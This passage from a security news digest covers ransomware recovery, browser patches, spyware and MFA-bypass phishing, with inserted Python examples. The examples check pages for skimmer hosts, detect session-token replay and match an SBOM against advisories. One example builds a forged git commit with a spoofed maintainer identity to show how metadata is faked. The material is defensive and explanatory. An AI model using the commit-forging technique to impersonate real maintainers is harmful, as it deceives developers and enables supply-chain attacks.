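        if algo in ("sha256", "sha384", "sha512") and sri_for(body, algo) == f"{algo}-{b64}":
            return True
    return False


if __name__ == "__main__":
    for host, reason in findings(SAMPLE_PAGE):
        print(f"{host}: {reason}")
```

Run it against the HTML your provider actually serves to the browser (after any tag manager has fired), not the template in the repository; skimmers are injected at serve time. A finding of "host not in approved inventory" on a checkout or payment page is the signal worth alerting on.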

Read more in

DoJ, FBI Recover Ransomware Payments Made by Healthcare Organizations

The US Department of Justice (DoJ) and the FBI have recovered half a million dollars in ransomware payments made to North Korean state-sponsored threat actors. The funds have been returned to two healthcare organizations. In addition, DoJ and the FBI were able to disrupt the threat actors’ operations.

Note

  • The hype around "cryptocurrency" and blockchain had reached unbelievable and really dangerous levels, so it is good to see criminal use of them being used by authorities to disrupt and catch criminals. Of course, many victims paid in crypto coins that in a few days were worth a small percentage of what was paid for them – kinda like recovering nickels when you lost $100 bills…
  • This is why you want a relationship with the FBI before you need it. The cooperation from the Kansas-based facility allowed not only the recovery of the ransom payment, but also the identification of a previously unidentified ransomware strain. Note that ransom payments for other victims were recovered, but without their reporting it's unlikely those funds will be properly restored.

Read more in

Apple Releases Updates for Multiple Products

Apple has released updates for multiple products, including macOS Catalina, macOS Big Sur, macOS Monterey, iOS and iPadOS, watchOS, tvOS, and Safari. The updates address nearly 40 vulnerabilities, including a memory corruption flaw in WebRTC.

Note

  • The memory corruption flaw in WebRTC (CVE-2022-2294) is the same flaw Google disclosed as being actively exploited in Chrome browsers. Note the Safari update is included in the macOS 12.5 update, but must be installed separately on macOS 11.6 and 10.15. In addition to addressing vulnerabilities, iOS and iPadOS 15.6 include bug fixes and some new features such as being able to restart a live stream viewed with the TV app.

Read more in

FCC Investigates Mobile Carriers’ Use of Geolocation Data

The US Federal Communications Commission (FCC) is investigating how mobile carriers use geolocation data. FCC chair Jessica Rosenworcel has sent letters of inquiry to 15 mobile providers, asking them to answer a series of questions about their geolocation data retention and data sharing policies.

Note

  • While the FCC fined the major carriers over $200M in 2020 around misuse of customers location data, this issue has been a problem for more than a decade and the FCC has been slow to define user rights and carrier regulations around location data. If you have corporate wireless contracts with carriers, try to get questions around location data use and protection into RFPs – the market needs to feel demand around privacy.
  • This follows up on the FCC's February 2020 proposed fine of $208 million after determining that Sprint, AT&T, Verizon and T-Mobile were selling access to customers' location information without ensuring that adequate protections were in place to prevent misuse of that information.

Read more in

Candiru Spyware Exploited Chrome Vulnerability

A vulnerability in Chrome that was patched earlier this month was previously exploited by Candiru spyware. The flaw was reported to Google on July 1 by researchers from Avast, who discovered the issue while investigating a spyware attack.

Note

  • Web Real-Time Communications (WebRTC) provides a JavaScript interface for real-time voice, text and video communication between web browsers and devices. The WebRTC flaw, fixed July 4th, is being actively exploited. As such, you need to make sure that not only are your Chrome updates pushed out, but also that users are restarting the browser for the update to take effect. You can now push enterprise settings for Chrome browsers to both auto-update and force the relaunch within a defined period.

Read more in

Missouri’s BJC Healthcare Settles Class Action Lawsuit

BJC Healthcare in Missouri has agreed to pay eligible class action members between $250 and $5,000 each, and to implement security improvements, including multi-factor authentication (MFA). BJC estimates the terms of the settlement will cost about $2.7 million.

Note

  • If you're impacted and seeking restitution, make sure you have a paper trail to support your claims of expenses incurred. If you allow remote access to your email, enforce MFA, excluding SMS and phone-call verification methods. If you already have MFA, make sure it's phishing resistant; if not, create a plan to get there from here.

Read more in

Transparent Tribe adds new tools to its arsenal as it targets Indian colleges

Cisco Talos has been tracking a new malicious campaign operated by the Transparent Tribe APT group. This campaign involves the targeting of educational institutions and students in the Indian subcontinent, a deviation from the adversary’s typical focus on government entities. The attacks result in the deployment of CrimsonRAT, Transparent Tribe’s malware of choice for establishing long-term access into victim networks. We assess with high confidence that a Pakistani web hosting services provider “Zain Hosting” was used for deploying and operating components of Transparent Tribe’s infrastructure. This is likely one of many third parties Transparent Tribe employs to prepare, stage and/or deploy components of their operation. Transparent Tribe primarily uses three Windows-based malware families to carry out espionage activities against their targets, including CrimsonRAT and ObliqueRAT. Read more: Transparent Tribe begins targeting education sector in latest campaign

ClamAV signature: Doc.Dropper.CrimsonRAT-9953641-4

Google fixes several vulnerabilities in Chrome, including one actively exploited in the wild

Google released a series of patches for its Chrome web browser, including fixes for a high-severity heap buffer overflow vulnerability (CVE-2022-2294) in WebRTC. An attacker could exploit this vulnerability to carry out a range of malicious actions, including crashing the targeted device, causing a denial of service or executing remote code. Google stated in its release that CVE-2022-2294 is actively being exploited in the wild and is withholding additional information until users can patch for the issue. Additionally, Cisco Talos discovered a vulnerability in Chrome's WebGPU standard that causes a use-after-free condition. The WebRTC vulnerability is the fourth zero-day vulnerability in Chrome to appear in the wild this year.

Read more in

Maliciously Crafted Password Crackers Target Industrial Systems

Threat actors are using Programmable Logic Controller password cracking tools that contain trojans to infect industrial systems. Researchers from Dragos have analyzed a malicious password cracking tool that contains malware known as Sality, which corrals infected systems into being part of a botnet.

Note

  • Downloading a random password cracker or any piece of software for that matter, and using it in a production environment without verifying the source and integrity of said software is never a good idea.
  • Downloading password crackers from unvetted sources and running them in production on systems connected to the Internet are 3 very bad practices. Great write-up by Dragos.
  • In this case, the password "cracking" tool doesn't crack the password; it exploits a vulnerability in the firmware that allows the password to be retrieved. While the tool required a serial connection, Dragos researchers determined the exploit also works over an Ethernet connection. Automation Direct has released a firmware update for this weakness; see CISA ICS Advisory 22-167-02. The Dragos blog post lists other PLCs and HMIs for which the threat actor sells password "cracking".

Read more in

Spoofed GitHub Commit Metadata Creates Potential for Software Supply Chain Attacks

Researchers from Checkmarx say that spoofed metadata could be used to trick developers into using repositories that contain malicious code. Developers need to be vigilant about verifying the identities associated with commits.

Note

  • Verifying whether software is safe to use is hard. Between typosquatting and bad actors taking over legitimate repositories, it can be difficult to identify "trusted" components. Open-source components included in your software should at least be run through a static code analysis tool to look for obvious issues. Even better: if your code analysis tool finds an issue, fix it and submit a pull request.
  • I stumbled upon this issue when committing to GitHub from a virtual machine that had the wrong date and time. As I investigated it, I was surprised to see this was expected behavior. I knew there had to be a way to abuse it somehow and the folks at Checkmarx have documented just that.
  • GitHub has features (like vigilant mode) to make it easier for developers to detect spoofed identities; work with App Dev to get that made part of standard processes. The entire open source software/repository supply chain needs to raise the bar on security. The Linux Foundation "Open Source Software Security Mobilization Plan" detailed the critical areas; more funding for faster progress is needed.
  • Attackers are manipulating data related to update activities as well as spoofing who they are to lead you to believe they are a highly trusted contributor who is actively maintaining their code. This can be partly mitigated by making sure that the commits come from someone whose identity has been verified by GitHub when those commits are being made. Don’t wait for the 2023 deadline to enable 2FA on your GitHub accounts. If you digitally sign your code, the “vigilant mode” feature can be used to see the status of all code submitted under that name, aiding the discovery of malfeasance.
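The reason the spoofing works is visible in the commit object itself: the author and committer lines, including name, e-mail and date, are plain text supplied by whoever runs git commit, and the commit id only hashes that text, it does not authenticate it. The following added example (not code from Checkmarx or GitHub) builds a commit object carrying a forged maintainer identity and a 2012 date, computes the object id git would assign, and shows that the only field a verifier can rely on is a gpgsig header, whose presence a parser can detect but whose validity still has to be checked against a trusted key (git verify-commit, or GitHub's Verified badge with vigilant mode). The tree id is the well-known empty tree; the names, e-mail and signature body are placeholders constructed for the example.

```python
"""Git commit metadata is free text; only a signature binds it to a key.
Added example; identities, dates and the signature body are constructed."""
import hashlib

EMPTY_TREE = "4b825dc642cb6eb9a060e54bf8d69288fbee4904"  # git's well-known empty tree

# Stand-in for a real ASCII-armored signature (constructed placeholder).
PLACEHOLDER_SIG = "-----BEGIN PGP SIGNATURE-----\n\nplaceholder-signature-body\n-----END PGP SIGNATURE-----"


def make_commit(name, email, timestamp, message, tree=EMPTY_TREE, gpgsig=None):
    """Build a commit object body exactly as git stores it. Anyone can put any
    name, e-mail and date here; that is the whole problem."""
    ident = f"{name} <{email}> {timestamp} +0000"
    lines = [f"tree {tree}", f"author {ident}", f"committer {ident}"]
    if gpgsig:
        # Multi-line header values continue on lines that start with a space.
        lines.append("gpgsig " + gpgsig.replace("\n", "\n "))
    return "\n".join(lines) + "\n\n" + message + "\n"


def object_id(body: str) -> str:
    """The commit id git assigns: sha1 over "commit <len>\\0" + body."""
    raw = body.encode()
    return hashlib.sha1(b"commit %d\0" % len(raw) + raw).hexdigest()


def parse_commit(body: str) -> dict:
    """Split a commit object into its headers (each a list, since 'parent' can
    repeat) and the message."""
    headers, lines, i = {}, body.split("\n"), 0
    while i < len(lines) and lines[i]:
        key, _, value = lines[i].partition(" ")
        i += 1
        while i < len(lines) and lines[i].startswith(" "):  # continuation lines
            value += "\n" + lines[i][1:]
            i += 1
        headers.setdefault(key, []).append(value)
    headers["message"] = "\n".join(lines[i + 1:])
    return headers


def identity(field: str) -> dict:
    """Decode an author/committer value into its parts."""
    name_email, ts, tz = field.rsplit(" ", 2)
    name, _, email = name_email.rpartition(" <")
    return {"name": name, "email": email.rstrip(">"), "timestamp": int(ts), "tz": tz}


def is_signed(headers: dict) -> bool:
    """Presence of gpgsig only; validity requires verifying against a key."""
    return "gpgsig" in headers


# A forged commit: looks like a 2012 commit by the project maintainer.
FORGED = make_commit("Trusted Maintainer", "maintainer@example.org", 1325376000,
                     "Looks like a 2012 commit by the maintainer")
# What a genuinely signed commit looks like structurally (signature is a placeholder).
SIGNED = make_commit("Trusted Maintainer", "maintainer@example.org", 1658880000,
                     "Real commit (signature body is a placeholder)", gpgsig=PLACEHOLDER_SIG)

if __name__ == "__main__":
    for label, body in (("forged", FORGED), ("signed", SIGNED)):
        h = parse_commit(body)
        a = identity(h["author"][0])
        print(f"{label}: {object_id(body)} {a['name']} <{a['email']}> "
              f"@{a['timestamp']} signed={is_signed(h)}")
```

A branch-protection rule that requires signed commits, plus vigilant mode on the accounts whose names appear in your history, is the practical way to turn "is this header signed" into "is this header true".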

Read more in

Microsoft is Investigating Exchange and Outlook Outage

Microsoft is looking into an outage affecting Exchange Online and Outlook. The issue appears to have begun over the weekend. Outlook and Exchange Online users have been reporting that they have had difficulty logging in and sending email. Microsoft says they have identified and resolved the problem.

Note

  • Gee, I wonder how many phishing emails didn’t get delivered? On the serious side, 2FA approaches that rely on sending codes to email addresses are more vulnerable to delivery outages than those that use mobile devices and SMS messages or authenticator apps.
  • Microsoft stated they found a section of network infrastructure performing below acceptable thresholds and rerouted that traffic, as well as restarted services to resolve the issues. In today’s interconnected and interdependent systems required to deliver an online service like these, network performance dips can have a significant impact on service delivery, making it increasingly important to not only understand these relationships, but also to detect and react to issues rapidly.

Read more in

Remove Kaswara Modern WPBakery Page Builder Addons for WordPress Now

The Wordfence threat intelligence team has noted an uptick in attempts to exploit a vulnerability in Kaswara Modern WPBakery Page Builder Addons. The critical file upload flaw was disclosed earlier this year; no fix was released, and the plugin is no longer supported. The Wordfence team is urging WordPress users to remove Kaswara Modern WPBakery Page Builder Addons from their sites.

Note

  • Wordfence released updated firewall rules May 21st and April 21st for the free and Premium/Care/Response versions, respectively. At this point it is unlikely the weakness will be resolved, and Wordfence has seen about 444,000 attempted attacks a day, so it’s time to remove and replace this plugin. Also check your site for the listed IOCs.

Read more in

Juniper Patches Hundreds of Flaws in Multiple Products

Juniper Networks has released fixes for vulnerabilities in multiple products, including Junos Space, Contrail Networking, and NorthStar Controller. Several of the flaws are critical, prompting the US Cybersecurity and Infrastructure Security Agency (CISA) to urge admins to update without delay. Some of the flaws could be exploited to take control of vulnerable systems.

Note

  • The fixes include updates to the underlying CentOS 6.8 shipped with some products to CentOS 7.9. The update to Contrail Networking 21.4.0 addresses 166 vulnerabilities, while the update to Space network management 22.1R1 addresses 31. Several of these vulnerabilities have CVSS base scores of 9.6 or higher, so you'll want to go to the Juniper Security Advisory site and proactively search for your products. Note the CISA advisory simply advises you to read the Juniper Security Advisory page and apply relevant updates.
    www.cisa.gov: Juniper Networks Releases Security Updates for Multiple Products

Read more in

Albania’s Online Government Services Hit with Cyberattack

Many Albanian government e-services are unavailable after suffering a cyberattack. The incident was detected on July 15. The government took its systems offline to deal with the attack, just months after moving government services online.

Note

  • While the Albanian government has assured citizens that their data is backed up, it’s not clear that the root cause has been identified or remediated so those backups can be applied. Additionally, it’s been noted these services were only recently being moved online, so it’s likely the full plans for redundancy and resiliency hadn’t been implemented. In today’s climate, you need to start with those defenses in place prior to going live, particularly if you’re operating a government affiliated service. You may also want to add practicing service restoration to your acceptance criteria for going live.

Read more in

Former CIA Programmer Guilty of leaking Vault 7 Data to WikiLeaks

Former CIA software engineer Joshua Adam Schulte has been convicted on charges related to his theft of national defense data and giving it to WikiLeaks. Known as Vault 7, the trove of data included cyber espionage tools the US government uses to infiltrate terrorist and foreign government networks. Schulte could face up to 80 years in prison.

Note

  • The release to WikiLeaks was allegedly motivated by an abject hatred for the CIA. With that level of access, Schulte would not only have had to obtain a security clearance, but also sign enough NDA documents assuring his fate in the event he violated them. Schulte also was found to have child exploitation material on his laptop, so he’s going to be busy paying his debt to society for a very long time.

Read more in

Attackers Targeting Elastix VoIP Systems to Install Web Shells

Researchers from Palo Alto Networks Unit 42 say that attackers are targeting Elastix VoIP telephony servers. The threat actor "implants a web shell to exfiltrate data by downloading and executing additional payloads inside the target's Digium phone software." The researchers believe the attackers may be exploiting a critical remote code execution vulnerability in FreePBX with restapps installed; a fix has been available for that flaw since late 2021.

Note

  • Make sure you’re running the updated FreePBX software, ingest the IOCs in the Unit 42 blog, and check for unexpected new root accounts or scheduled tasks.

Read more in

Citizen Lab: Pegasus Used Against Thai Pro-Democracy Activists

A report published by researchers from the University of Toronto’s Citizen Lab and Digital Watch says that at least 30 Thai pro-democracy activists were targeted with NSO’s Pegasus Spyware. The infections occurred between October 2020 and November 2021. The attacks were revealed when Apple began sending notifications to iPhone users being targeted by the spyware.

Note

  • Make sure that your users are running the latest iOS versions, which close the attack vector used by Pegasus. If you have users who may be targeted, consider Apple's Lockdown Mode, which will be released with iOS 16 this fall.

Read more in

Retbleed Vulnerability Fixed in Linux Kernel

The Retbleed speculative execution attack vulnerability has been fixed in the Linux kernel, according to Linus Torvalds. The release of Linux kernel version 5.19 has been delayed for a week due in part to the complexity of the Retbleed vulnerability, and in part to two other development trees that requested extensions.

Note

  • The btrfs file system and firmware for Intel GPU controllers branches also called for a delay. It is likely that version 5.20 of the kernel will be chosen as the next long-term support release.

Read more in

L3Harris ends talks to buy NSO Group’s surveillance technology

Looks like U.S. defense firm L3Harris is dropping its bid to buy NSO Group’s surveillance technology — the maker of the mobile spyware Pegasus. It comes not long after the White House warned any deal raised “serious counterintelligence” concerns because of the company’s close ties with the Israeli government, months after NSO was put on a U.S. sanctions list, and was almost certainly the deal’s death knell. The Guardian’s @skirchy reports some government-insider bickering over the deal, but without the blessing from the U.S. government, L3Harris had no way but to back away from the table, leaving NSO’s future in doubt.

Read more in

A key fob bug lets anyone remotely unlock and start Honda cars

The Drive: A bug in Honda key fobs, which researchers are calling Rolling Pwn, allows anyone to wirelessly steal authentication codes from a Honda car owner's key fob, which can then be used to remotely unlock and start the car. The Drive verified the bug and tried it out on a 2021 Honda Accord using a software-defined radio to capture and replay the stolen key fob codes. Honda initially flip-flopped on whether it was going to fix the bug, since rolling out updates to non-internet-connected key fobs isn't easy at all — the car maker said it plans to have an "improved system" for future vehicles.

Read more in

Rob Stumpf tweet: "I was able to replicate the Rolling Pwn exploit using two different key captures from two different times. So, yes, it definitely works."

Amazon gave Ring videos to police without owners’ permission

Ring handed over 11 people's information without a warrant and without their consent so far this year, per a letter from a Ring executive to lawmakers this week. Ring video doorbells are always on and recording, and the Amazon-owned unit has cozy relationships with over 2,100 police departments across the United States. But police are also taking advantage of "exigent" circumstances that allow Ring to turn over video footage without legal process in emergency settings — but that's a broad category and Amazon doesn't spell out explicitly what counts as an emergency. Worse, Ring doesn't disclose how many times it's handed over data in allegedly emergency situations. According to Ring's latest transparency report, Ring processed 3,147 legal demands last year — up 65% on the year earlier — and turned over content data in about four out of 10 cases. But still no word on those emergency figures… it's almost like Ring doesn't want you to know.

Read more in

‘Vault 7’ leaker found guilty after massive leak of CIA secrets

Former CIA engineer Joshua Schulte has been found guilty in all nine charges filed against him over what’s been claimed is the biggest theft of classified information in CIA history. Schulte leaked a vast trove of hacking tools to WikiLeaks, which published the files as “Vault 7”. The tools included zero-day exploits able to hack into iPhones, Android devices, and bug the microphones embedded in internet-connected televisions. The SDNY, which prosecuted the case, flat-out called Schulte’s leak “espionage,” which could lead to further fallout for WikiLeaks. The New Yorker had a great story a month ago on how the leak went down.

Read more in

European Central Bank head targeted in hacking attempt

Associated Press: Here’s a pretty brazen social engineering attempt on one of the world’s most powerful financiers: Christine Lagarde, head of the European Central Bank, was “recently” targeted by a hacking attempt but was “halted quickly.” Turns out someone spoofed former German chancellor Angela Merkel’s cell phone number and sent a text message to Lagarde asking her to send back an authentication code, which would have allowed the hackers to create a WhatsApp account in Lagarde’s name, according to Reuters ($). It’s not clear who was behind the attempt.

Read more in

Here’s how North Korean operatives are trying to infiltrate U.S. crypto firms

Here’s a deeper dive by @snlyngaas on how North Korean hackers are posing as tech workers and getting hired at crypto-related companies to ultimately steal cryptocurrency funds and assets to fund Pyongyang’s nuclear weapons program. “These guys know each other. Even if a particular IT worker isn’t a hacker, he absolutely knows one,” said one former FBI intelligence analyst. “Any vulnerability they might identify in a client’s systems would be at grave risk.” Read more: Here’s how North Korean operatives are trying to infiltrate US crypto firms

CISA urges federal agencies to patch Windows bug actively exploited

CISA has ordered all federal civilian agencies to patch a Windows escalation of privilege bug because Microsoft says there is evidence that the bug is being actively exploited. The bug affects Windows 7 and Windows Server 2008 and later, and “allows an attacker to execute code as SYSTEM, provided they can execute other code on the target,” per Trend Micro. Microsoft patched the bug, tracked as CVE-2022-22047, as part of its regular Patch Tuesday updates, but CISA warned agencies to act before August 2. Read more: CISA adds Windows bug to exploited list, urges agencies to patch by August 2

How a GOP-led Congress might change cybersecurity

With the possibility of the Republicans taking Congress at the midterm elections later this year, Politico looks at how cybersecurity — although a rare area of bipartisan compromise — would fare under GOP leadership, and how cybersecurity funding and CISA’s budget will likely be cut. @ericgeller’s tweet thread is a helpful tl;dr. Read more: After key retirements, GOP poised to adopt more combative cyber agenda

Reverse keyword warrants face first major legal challenge

FOIA lawyer @bethbourdon had a great tweet thread looking at reverse keyword warrants, a way in which law enforcement demands that Google provides information on anyone who searched a particular keyword at a given moment in time — such as before a crime was committed. These warrants are highly controversial because they can, just like geofence warrants, ensnare entirely innocent people. As such, these reverse keyword warrants are now subject to a legal challenge that could determine their constitutionality. NBC News has a good piece on where the court case is, and how these kinds of warrants could — and likely will — be used now that Roe v. Wade has been overturned. Read more: Reverse Keyword Warrant Challenged After Cops Asked Google To Search Millions Of People’s Data Multiple Times

A ransomware attack on a debt collection firm is one of 2022's biggest health data breaches

A little-known debt collection firm called PFC was hit by a ransomware attack that affected more than 650 healthcare organizations and facilities across the U.S. In a filing with HHS' Office for Civil Rights, which enforces the HIPAA privacy and security rules, PFC said 1.91 million patients are affected. That's just shy of the 2 million affected by a separate breach affecting a medical imaging company in March 2022. Read more: A ransomware attack on a debt collection firm is one of 2022's biggest health data breaches

macOS sandbox escape discovered and patched

Microsoft found and published a blog this week uncovering a sandbox escape in macOS, designed to keep app processes and data separate and isolated from one another. The bug could be used to “gain elevated privileges on the affected device or execute malicious commands like installing additional payloads.” Read more: Uncovering a macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706

New phishing campaign skirts MFA

Ars Technica has a write-up on a new phishing campaign that’s targeted at least 10,000 organizations since September and can hack users even with multi-factor authentication enabled. The attack works like a man-in-the-middle attack but using a proxy site run by the attackers. The user enters their credentials on a phishing page, the page passes the credentials to the real server that the user is trying to login to, which returns a session token letting the user log in. But the attackers copy the session token as it’s sent back to the user via the proxy site. The user logs in, but the attacker now has the user’s session token in hand, allowing the attacker to log in as that authenticated user. Microsoft’s MSTIC explains more in a blog post.

A screenshot showing the process in which attacker steal session tokens by way of a proxy-in-the-middle server.
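The proxy leaves one durable trace in the identity provider's logs: the session was issued to the client the phishing page relayed through, and is then used from wherever the attacker replays the stolen cookie. The following added example (not code from Microsoft's MSTIC post or Ars Technica) runs that check over constructed sign-in and activity log lines: it records the client (IP, user agent) each session id was first issued to and flags any later use of the same session from a different client, rating the finding high when the user agent changes or the action is one attackers take to persist, such as creating an inbox rule. The log schema, field names, addresses and the list of high-risk actions are assumptions for the example, not a real product's format.

```python
"""Session-token replay detection over sign-in and activity logs (added example).
The log format, lines, addresses and action names are constructed."""
import re

LINE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\S+) user=(?P<user>\S+) sid=(?P<sid>\S+) "
    r"ip=(?P<ip>\S+) ua=(?P<ua>.+)$"
)

# Constructed sample: alice's session is issued to 198.51.100.7 (the proxy the
# phishing page relayed her through) and later replayed from 203.0.113.55 with
# a different client to add an inbox rule. bob's session is only ever used from
# the client it was issued to.
SAMPLE_LOG = """\
2022-07-18T09:12:04Z signin user=alice@example.com sid=S1 ip=198.51.100.7 ua=Chrome/103
2022-07-18T09:12:40Z mailbox.read user=alice@example.com sid=S1 ip=198.51.100.7 ua=Chrome/103
2022-07-18T09:20:11Z inbox_rule.create user=alice@example.com sid=S1 ip=203.0.113.55 ua=curl/7.84
2022-07-18T10:01:00Z signin user=bob@example.com sid=S2 ip=192.0.2.10 ua=Firefox/102
2022-07-18T10:05:00Z mailbox.read user=bob@example.com sid=S2 ip=192.0.2.10 ua=Firefox/102
"""

# Actions attackers take right after stealing a session (assumed names).
HIGH_RISK_ACTIONS = {"inbox_rule.create", "mfa.method.add", "oauth.consent"}


def parse(log_text: str) -> list:
    """Parse log lines into dicts; lines that do not match the schema are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def replayed_sessions(events: list) -> list:
    """One finding per event whose (ip, ua) differs from the client the session
    id was first issued to. A bare IP change alone is rated low because users
    roam; a user-agent change or a persistence action is rated high."""
    issued, findings = {}, []
    for e in events:
        origin = issued.setdefault(e["sid"], (e["ip"], e["ua"]))
        current = (e["ip"], e["ua"])
        if current == origin:
            continue
        ua_changed = e["ua"] != origin[1]
        findings.append({
            "sid": e["sid"], "user": e["user"], "action": e["action"], "ts": e["ts"],
            "issued_to": origin, "used_from": current,
            "severity": "high" if (ua_changed or e["action"] in HIGH_RISK_ACTIONS) else "low",
        })
    return findings


if __name__ == "__main__":
    for f in replayed_sessions(parse(SAMPLE_LOG)):
        print(f"{f['severity']}: {f['user']} session {f['sid']} issued to {f['issued_to']} "
              f"used from {f['used_from']} for {f['action']} at {f['ts']}")
```

Treat this as a detection, not a fix: an attacker who replays from a residential proxy with a matching user agent will not trip it. The durable fix is the one the BJC note above points at, phishing-resistant MFA (FIDO2/WebAuthn), which binds the authentication to the real origin so the proxy never obtains a usable session in the first place.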

FTC calls BS on anonymized data

The Federal Trade Commission warned this week that it is “committed” to fully enforcing the law against the illegal sharing of highly sensitive location and other health data, especially in light of the overturning of Roe v. Wade. The FTC said apps and services often make claims that data is “anonymous” or “has been anonymized,” but that these claims are often deceptive or untrue. Even when data is said to be anonymized, it can often — very easily — be linked to real people with other supplemented data (which companies either have or can easily get, thanks to advertising IDs), explains @karlbode. “Companies that make false claims about anonymization can expect to hear from the FTC,” the government agency said. Read more: Location, health, and other sensitive information: FTC committed to fully enforcing the law against illegal use and sharing of highly sensitive data

Log4j bug becomes ‘endemic,’ review board finds

CISA's Cyber Safety Review Board, the 15-member panel founded last year to help understand and improve the government's approach to cybersecurity, published its inaugural report into the Log4j vulnerability, which went wild ahead of last December's holiday season. The board's findings show that although the bug was discovered and reported by a cloud engineer at Alibaba, one of China's biggest cloud providers, the board found no evidence that China used its advance knowledge of the bug to exploit networks. But the board warned that Log4Shell, as the bug became known, has become an "endemic vulnerability," meaning unpatched versions of the omnipresent software could be with us for the next decade or so. Luta Security, run by @k8em0, has a blog post with guidance and recommendations for organizations. And check out @argvee, the board's deputy chair, who has a tweet thread on the findings.

Dozens of Lenovo laptop models affected by UEFI flaw

Dozens of Lenovo laptop models are vulnerable to a firmware flaw that allows attackers to install malware that’s virtually impossible to detect or remove, per Ars Technica. The laptop maker released updates for the three flaws that can be exploited during the boot process, which can be used to gain persistence even if the operating system is wiped and reinstalled. Read more: Vulnerabilities that could allow undectable infections affect 70 Lenovo laptop models

Chinese APT targeted White House reporters ahead of Jan. 6 insurrection

In the days preceding the January 6 attack on the US Capitol, Chinese state-sponsored hackers changed the targets of their email phishing campaigns to go after US political and national security reporters, security firm Proofpoint said in a report published on Thursday.

The company linked the campaign to a group it calls TA412, also known as Zirconium and APT31, and described the attacks as “a very abrupt shift in targeting.”

The sudden change in targeting from TA412, which typically goes after diplomatic targets, suggests the group may have anticipated the turmoil surrounding the transfer of power in the US government, picking up on hints and threats left online on forums and social media by Trump supporters.

And Proofpoint said that TA412 didn’t just go after any natsec reporters but specifically focused on “Washington DC and White House correspondents,” the journalists who would have had their finger on the pulse of that day’s events.

Proofpoint only saw the phishing campaign and was not able to tell if any attempts were successful, but said that TA412 returned to target reporters later in the year, this time the ones covering cybersecurity, surveillance, and privacy issues with a focus on China.

TA412 also carried out a third campaign against US media organizations in February this year, and this time they targeted the newsrooms reporting on political topics, with the group most likely trying to gather information shared by US officials with reporters on the US’ possible involvement in the rising tensions between Russia and Ukraine, tensions that eventually boiled over later that month, when Russia invaded Ukraine.

But Proofpoint said that Chinese hackers weren’t the only ones engaging in campaigns against reporters and media organizations over the past year and a half. For example, Proofpoint said that North Korean hackers also targeted reporters who wrote articles criticizing the country’s leader, while Iranian and Turkish threat groups tried to compromise the social media accounts of numerous reporters and newsrooms.

All in all, Proofpoint argues that the recent attacks highlight the risks facing journalists and other members of the news media, who are more attractive targets for cyberspies since they might not always benefit from the same training and IT resources that government officials might receive, and would be easier to compromise. Once compromised, reporter accounts can then be pilfered for information on sources and past interactions with government officials, or they can be used to launch new attacks against officials or sources, taking advantage of existing trust relationships.

CIA Vault7 leak

Joshua Schulte, the former CIA employee who leaked the Vault7 files to Wikileaks, was found guilty on all counts following a retrial. Schulte, who represented himself, claimed to the end that he was made a scapegoat by US authorities, even though multiple extensive reports portrayed him as hot-headed, egocentric, and self-entitled. A sentencing date was not set as Schulte is also on trial for child pornography possession and transport charges in a separate case.

OPM breach settlement

Victims of the 2014 and 2015 OPM data breaches are expected to receive about $700 each, while victims who can prove extensive damage are eligible for $10,000. The decision comes after several class-action lawsuits against the US government were consolidated last month into one case, which was settled for $63 million, per The Record.

Bandai Namco confirms ransomware attack

Bandai Namco, the Japanese gaming company behind the hit game Elden Ring, confirmed this week that it was hacked. The company’s admission comes after the AlphV ransomware gang listed the company on its leak site earlier this week.

LendingTree breach

Online lending company LendingTree formally disclosed a security breach almost a month after a threat actor dumped the details of more than 200,000 of its users on an underground cybercrime forum. Leaked details included customer names, physical addresses, phone numbers, emails, IP addresses, credit scores, and various loan application details. In a letter filed with the California OAG, the company said the breach occurred because of a vulnerability on its website that has now been patched. LendingTree is currently facing a class-action lawsuit following the breach.

Another Clearview AI fine

After being fined more than £7.5 million ($9.4 million) in the UK and another €20 million ($20 million) in Italy, facial recognition company Clearview AI received a third fine in Europe, another €20 million ($20 million) from Greek authorities.

Microsoft Salus is now open source

Microsoft this week officially open-sourced its Salus app, an internal tool the company has used in recent months to generate software bills of materials (SBOMs) for its internal projects. An SBOM is a list of the libraries used inside a software application. SBOMs let companies track whether an app uses third-party code and are incredibly useful when a vulnerability in one of those third-party libraries is disclosed, as they let the company quickly identify which of its own apps are also affected.
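As an added illustration (not part of the newsletter and not Microsoft’s Salus code), this is the kind of check an SBOM enables: matching a CycloneDX-style SBOM against an advisory list to find components whose version falls in an affected range, the Log4j scenario the review board describes elsewhere on this page. The SBOM document, the advisory identifiers and the version ranges below are constructed for illustration, not taken from a real vulnerability database.

```python
import json

# Constructed CycloneDX-style SBOM (only the fields this check needs), with
# libraries nested inside an application component, as CycloneDX allows.
SBOM_JSON = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {"type": "application", "name": "billing-service", "version": "1.4.0",
     "components": [
       {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
        "version": "2.14.1",
        "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
       {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api",
        "version": "2.14.1",
        "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"}
     ]},
    {"type": "library", "group": "com.fasterxml.jackson.core", "name": "jackson-databind",
     "version": "2.13.1",
     "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.13.1"}
  ]
}
"""

# Constructed advisory list: the ids are placeholders and the version ranges
# are illustrative only (introduced <= affected < fixed).
ADVISORIES = [
    {"id": "EXAMPLE-ADV-0001 (Log4Shell-style entry)",
     "package": "pkg:maven/org.apache.logging.log4j/log4j-core",
     "introduced": "2.0", "fixed": "2.17.1"},
    {"id": "EXAMPLE-ADV-0002",
     "package": "pkg:maven/com.fasterxml.jackson.core/jackson-databind",
     "introduced": "2.9.0", "fixed": "2.12.0"},
]


def version_key(version):
    """Turn '2.14.1' into (2, 14, 1) so releases compare numerically.
    A non-numeric suffix such as '-rc1' is ignored, which is adequate for
    release builds but treats a pre-release like the release it precedes."""
    parts = []
    for piece in version.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def compare_versions(a, b):
    """Return -1, 0 or 1; pads with zeros so '2.17' equals '2.17.0'."""
    ka, kb = version_key(a), version_key(b)
    width = max(len(ka), len(kb))
    ka += (0,) * (width - len(ka))
    kb += (0,) * (width - len(kb))
    return (ka > kb) - (ka < kb)


def is_affected(version, introduced, fixed):
    """Affected when introduced <= version < fixed."""
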